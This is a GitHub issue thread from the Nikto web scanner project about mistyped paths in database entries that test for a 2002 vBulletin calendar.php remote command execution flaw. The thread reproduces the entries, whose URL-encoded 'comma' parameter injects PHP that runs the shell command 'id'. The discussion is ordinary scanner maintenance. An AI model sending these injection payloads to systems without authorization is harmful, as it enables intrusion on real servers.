search

sullo / nikto

Nikto web server scanner
Other
8.6k stars 1.24k forks source link

Typos in Vbulletin calendar.php RCE? #387

Closed ghost closed 8 years ago

ghost commented 8 years ago

I'm not quite sure but most of those:

"003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003040","3299","8","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003041","3299","8","/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003042","3299","8","@VBULLETINvbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003043","3299","8","@VBULLETINvbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","",""
"003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","

are looking like typos to me.

The advisories are mostly just referring to calendar.php:

https://www.exploit-db.com/exploits/21874/ http://www.securityfocus.com/bid/5820/exploit https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1660

so probably they should be:

/forumscalendar.php -> /forums/calendar.php /forumzcalendar.php -> /forumz/calendar.php /htforumcalendar.php -> /htforum/calendar.php @VBULLETINvbcalendar.php and @VBULLETINvbulletincalendar.php -> @VBULLETINcalendar.php

Any opinions about this?

sullo commented 8 years ago

I'm guessing you are correct all around. Not sure where "vbcalendar.php" came from but... seems wrong.

On Tue, Jun 14, 2016 at 9:01 AM, RealRancor notifications@github.com wrote:

I'm not quite sure but those:

"003039","3299","8","/forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" "003040","3299","8","/forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" "003041","3299","8","/htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" "003042","3299","8","@VBULLETINvbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" "003043","3299","8","@VBULLETINvbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","" "003044","3299","8","@CGIDIRScalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","GET","uid=","","","","","Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html","","

The advisories are mostly just referring to calendar.php:

https://www.exploit-db.com/exploits/21874/ http://www.securityfocus.com/bid/5820/exploit https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1660

so probably they should be:

/forumscalendar.php -> /forums/calendar.php /forumzcalendar.php -> /forumz/calendar.php /htforumcalendar.php -> /htforum/calendar.php @VBULLETINvbcalendar.php and @VBULLETINvbulletincalendar.php -> @VBULLETINcalendar.php

Any opinions about this?

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/sullo/nikto/issues/387, or mute the thread https://github.com/notifications/unsubscribe/ABaBRD2KWxzfqEFGYchUzFpYFJHIntCqks5qLqY_gaJpZM4I1S6r .

ghost commented 8 years ago

I think i found the issue. vbcalendar.php and vbulletincalendar.php probably should have been /vb/calendar.php and /vbulletin/calendar.php.

Just created a PR with a possible fix: https://github.com/sullo/nikto/pull/388